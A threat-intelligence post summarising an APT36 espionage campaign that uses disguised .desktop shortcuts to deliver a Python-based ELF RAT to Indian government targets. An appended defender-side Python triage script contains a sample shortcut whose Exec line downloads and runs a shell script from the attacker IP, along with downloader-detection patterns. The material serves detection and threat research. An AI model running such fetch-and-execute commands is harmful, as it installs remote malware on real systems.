CYFIRMA Research- APT36 Python Based ELF Malware Targeting Indian Government Entities

Update: 2025-12-11
Description

APT36 Targets Indian Government Entities with a New Python-Based ELF Malware.

CYFIRMA has uncovered a new cyber-espionage campaign by APT36 (Transparent Tribe), a Pakistan-based threat actor long known for targeting Indian government entities and strategic sectors.

This campaign showcases a major leap in the group’s technical sophistication — delivering custom Python-based ELF malware through weaponized .desktop shortcut files distributed via spear-phishing.

📌 Key Highlights:
The campaign begins with a malicious ZIP file containing a deceptive .desktop shortcut.
Once executed, the shortcut downloads:
    A decoy PDF to distract the user
    A malicious ELF payload (swcbc)
    A persistence-enabling shell script (swcbc.sh)

The malware establishes C2 communication, executes shell/Python commands, steals files, takes screenshots, and maintains persistence.

Infrastructure used includes Lionsdenim[.]xyz and 185.235.137.90, both tied to APT36’s ongoing espionage operations.

The ELF implant is a PyInstaller-packed RAT, supporting cross-platform execution on both Linux and Windows.
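As an added defender-side example (not code from the CYFIRMA report), a small Python triage routine that flags a .desktop shortcut matching the chain summarized above: an Exec line that fetches remote content, references to the infrastructure or payload names the report lists, and a launcher posing as a PDF. The two sample .desktop files and the assumption that the shortcut uses a common CLI downloader are constructed; the summary does not print the shortcut's contents.

```python
import re
from configparser import ConfigParser

# Infrastructure (refanged) and payload names as printed in the report summary.
KNOWN_IOCS = {"lionsdenim.xyz", "185.235.137.90"}
KNOWN_PAYLOADS = ("swcbc.sh", "swcbc")
# Assumption: the shortcut fetches its stages with a common CLI downloader.
DOWNLOADER_RE = re.compile(r"\b(curl|wget)\b")
URL_HOST_RE = re.compile(r"https?://([^/\s\"']+)")

def triage_desktop(text: str) -> list[str]:
    """Return findings for one .desktop file; an empty list means nothing suspicious."""
    findings: list[str] = []
    cp = ConfigParser(interpolation=None, strict=False)  # '%U' and duplicate keys are normal here
    cp.read_string(text)
    if "Desktop Entry" not in cp:
        return findings
    entry = cp["Desktop Entry"]
    exec_line = entry.get("Exec", "")
    if DOWNLOADER_RE.search(exec_line):
        findings.append("Exec fetches remote content")
    for host in URL_HOST_RE.findall(exec_line):
        if host.lower() in KNOWN_IOCS:
            findings.append(f"Exec contacts known APT36 infrastructure: {host}")
    for name in KNOWN_PAYLOADS:
        if name in exec_line:
            findings.append(f"Exec references reported payload name: {name}")
            break  # 'swcbc.sh' also contains 'swcbc'; report the most specific match only
    # A launcher that presents itself as a PDF is the decoy trick described in the summary.
    looks_like_pdf = entry.get("Name", "").lower().endswith(".pdf") or "pdf" in entry.get("Icon", "").lower()
    if looks_like_pdf and entry.get("Type", "").lower() == "application":
        findings.append("Application launcher disguised as a PDF document")
    return findings

# Constructed samples (not real lure contents): one mimicking the reported chain, one benign.
SUSPICIOUS_DESKTOP = """[Desktop Entry]
Type=Application
Name=Notice.pdf
Icon=application-pdf
Exec=sh -c "wget -q http://185.235.137.90/swcbc.sh -O /tmp/swcbc.sh; sh /tmp/swcbc.sh"
"""
BENIGN_DESKTOP = """[Desktop Entry]
Type=Application
Name=Text Editor
Icon=gedit
Exec=gedit %U
"""
```

Run `triage_desktop` over every .desktop file extracted from an inbound archive; the benign sample yields no findings, the suspicious one yields all four.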

Link to the Research Report: APT36 Python Based ELF Malware Targeting Indian Government Entities - CYFIRMA

#CyberSecurity #ThreatIntel #APT36 #MalwareAnalysis #IndianGovernment #LinuxMalware #CYFIRMA #CyberEspionage #ThreatResearch #ELFMalware #PyInstaller #TransparentTribe #ExternalThreatLandscapeManagement

https://www.cyfirma.com/

CYFIRMA